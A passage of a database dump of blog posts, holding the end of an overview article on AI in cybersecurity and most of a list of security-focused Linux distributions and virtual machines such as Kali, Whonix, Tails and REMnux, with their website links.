Models analyze things like transaction amounts, locations, and methods, allowing organizations to identify fraudulent behavior the moment it appears.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Endpoint Security</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Endpoint detection systems equipped with AI continuously monitor devices for suspicious behavior. For example, solutions like CrowdStrike use AI to detect the execution of unknown malicious files and stop them instantly.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Phishing Defense</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">AI systems can spot phishing attempts by analyzing the content, tone, and structure of emails. Tools like Google’s AI email scanner ensure that phishing emails are flagged before reaching inboxes.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Predictive Risk Analysis</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By analyzing attack patterns, AI can predict potential risks before they materialize. 
This enables organizations to shore up vulnerabilities and prioritize resources effectively.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits and Challenges of Integrating AI in Cybersecurity Practices</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Benefits</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Speed and Scalability</strong></b>: AI can analyze data at faster speeds than any human, making it ideal for large-scale operations and real-time decision-making.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Proactive Threat Detection</strong></b>: AI is designed to spot anomalies and recognize attack patterns before they can do harm.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Cost Efficiency</strong></b>: While initial investment may be high, AI reduces the long-term costs associated with breaches and remediation.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Challenges</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong 
class=\"font-bold\">False Positives</strong></b>: Even with advanced algorithms, AI can occasionally flag harmless activities as threats, adding extra work for IT teams.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Lack of Skilled Professionals</strong></b>: Integrating AI requires expertise in both cybersecurity and machine learning, making skilled talent a critical factor.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Ethical Concerns</strong></b>: AI systems often require access to sensitive data, raising questions about privacy and ethics.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Future Trends and Innovations in AI for Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The field of AI in cybersecurity is constantly evolving. 
As cyber threats grow more sophisticated, AI is expected to keep pace through innovations such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Self-Learning Systems</strong></b>: AI systems will soon be able to continually learn and adapt to changing threats without manual input.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">AI Collaboration Networks</strong></b>: Organizations may share AI-driven threat intelligence across industries for faster, global cyber defense.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Biometrics and Behavioral AI</strong></b>: Enhanced use of biometrics and behavioral patterns for user authentication will boost security in personal and enterprise systems alike.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">AI-Powered Cloud Security</strong></b>: With more businesses moving to the cloud, AI tools will play a vital role in securing cloud-based applications and storage.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Recommendations for IT Professionals and Cybersecurity Learners</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you are new to cybersecurity or an experienced professional, here are some 
recommendations to make the most of AI-powered approaches:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Learn the Basics</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Start by understanding the fundamental concepts of AI and how they integrate into cybersecurity systems. Taking online courses or certifications in machine learning and cybersecurity can provide a solid foundation.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Stay Updated</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity landscape evolves constantly. Subscribe to industry blogs, attend webinars, or follow leading AI and cybersecurity firms to stay informed about the latest trends.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Experiment with Tools</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Familiarize yourself with AI-driven cybersecurity tools like SentinelOne, Darktrace, and Palo Alto Networks\' Prisma. 
Experimenting with these tools can enhance your practical understanding.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Collaborate and Network</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Engage with the cybersecurity community on LinkedIn, GitHub, or forums. Collaboration often leads to valuable insights and access to resources.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Get Hands-On Experience</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Pursue internships or projects that integrate AI and cybersecurity. Real-world exposure is invaluable and can set you apart in this dynamic field.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">AI is no longer just a buzzword in cybersecurity—it’s the current and future standard. By empowering organizations with faster, smarter, and more proactive threat detection, AI is reshaping the way we approach online security. For professionals and learners in the field, understanding and leveraging AI is becoming an essential skill.</p>', '', NULL, NULL, 1, 'draft', '2025-01-26 00:22:57', '2026-01-12 21:41:44', 'Information Security', 'How Can AI Transform Cybersecurity? Use Cases and Insights', '', NULL),
(58, 'Top Linux Distributions and Virtual Machines for Cybersecurity Professionals', 'top-linux-distributions-and-virtual-machines-for-cybersecurity-professionals', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is a rapidly evolving field that requires a specialized set of tools and environments to perform tasks like penetration testing, threat analysis, incident response, and secure communication. Luckily, there is a variety of Linux distributions and virtual machines specifically crafted to meet these needs. Whether you’re an ethical hacker, forensic analyst, or threat intelligence professional, there\'s a solution to enhance your workflow. Below, we explore key operating systems and virtual machines, listing their unique features and official websites.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Kali Linux</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://www.kali.org/\">https://www.kali.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Known as the industry-standard platform for penetration testers, Kali Linux comes pre-loaded with hundreds of tools for ethical hacking, vulnerability assessment, and penetration testing. 
Its derivative, <b><strong class=\"font-bold\">Kali Purple</strong></b>, extends capabilities into the defensive side of security by including tools for both attack and defense, making it an all-in-one solution for cybersecurity experts.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Pre-installed hacking tools like Metasploit, Nmap, and Wireshark.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Community-driven updates for cutting-edge features.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Lightweight and customizable for advanced configurations.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Tsurugi Linux</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://tsurugi-linux.org/\">https://tsurugi-linux.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tsurugi Linux is designed for <b><strong class=\"font-bold\">digital forensics and incident response (DFIR)</strong></b> workflows. It includes specialized tools for analyzing malware, memory forensics, and disk imaging. 
Powerful and investigator-friendly, this distribution is critical for law enforcement and corporate investigations.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Tailored for malware and memory analysis.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Comprehensive forensic utilities for investigators.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Great for incident response planning and execution.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Predator OS</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://predator-os.com/\">https://predator-os.com/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Privacy-conscious cybersecurity professionals often turn to Predator OS, a distribution that prioritizes anonymity and ethical hacking. 
It combines security-focused features with tools necessary for penetration testing and vulnerability assessments.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Enhanced privacy for anonymous operations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">A user-friendly alternative for security professionals.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">BlackArch Linux</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://blackarch.org/\">https://blackarch.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">BlackArch is based on Arch Linux and offers a repository of over 2,000 tools for ethical hacking, making it ideal for advanced researchers and penetration testers. 
It\'s lightweight, scalable, and perfect for professionals who want maximum customization.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Huge repository of security-testing tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Designed for experienced users working on complex cybersecurity challenges.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Whonix</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://www.whonix.org/\">https://www.whonix.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whonix ensures <b><strong class=\"font-bold\">anonymity</strong></b> by routing all communications through Tor. 
Built on Debian, it separates workstations and gateways for added security, making it an exceptional choice for privacy-focused professionals.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Robust anonymity with Tor routing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Secure separation between workstations and gateways.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. <b><strong class=\"font-bold\">Tails (The Amnesic Incognito Live System)</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://tails.boum.org/\">https://tails.boum.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A live operating system crafted for absolute privacy, Tails leaves no trace behind after use. 
It is commonly used for secure browsing and communications, especially for those who value discreet cyber activities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">No persistent data storage for maximum security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Portable and easy to run as a live OS.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. <b><strong class=\"font-bold\">RedHunt OS</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://redhunt.os.com/\">https://redhunt.os.com/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">RedHunt OS combines tools for both defense and offense, making it ideal for adversary simulation and threat hunting. 
It takes a balanced approach to cybersecurity, catering to professionals who need capabilities for attack as well as protection.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Tools for adversary simulation and threat defense.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Comprehensive hybrid solution for varied security workflows.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. 
<b><strong class=\"font-bold\">Threat Pursuit VM</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://github.com/fireeye/ThreatPursuit-VM\">https://github.com/fireeye/ThreatPursuit-VM</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Built specifically for threat intelligence professionals, this Windows-based virtual machine offers a range of tools for research, malware analysis, and threat investigation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Tailored for malware and threat intelligence research.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Ideal for Windows-based work environments.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">9. 
<b><strong class=\"font-bold\">SIFT Workstation</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://digital-forensics.sans.org/community/downloads\">https://digital-forensics.sans.org/community/downloads</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The <b><strong class=\"font-bold\">SANS Investigative Forensics Toolkit (SIFT)</strong></b> is a virtual machine tailored for forensic analysts. It provides pre-configured tools for analyzing file systems and memory data, making investigations seamless and efficient.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Comprehensive forensic toolkit.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Developed by SANS Institute experts.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">10. 
<b><strong class=\"font-bold\">REMnux</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://remnux.org/\">https://remnux.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">REMnux focuses on reverse engineering malware, offering tools for analyzing malicious files and understanding complex threats. It\'s an essential resource for incident response teams.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Specialized for malware reverse engineering.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Lightweight and easy to use for targeted investigations.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">11. 
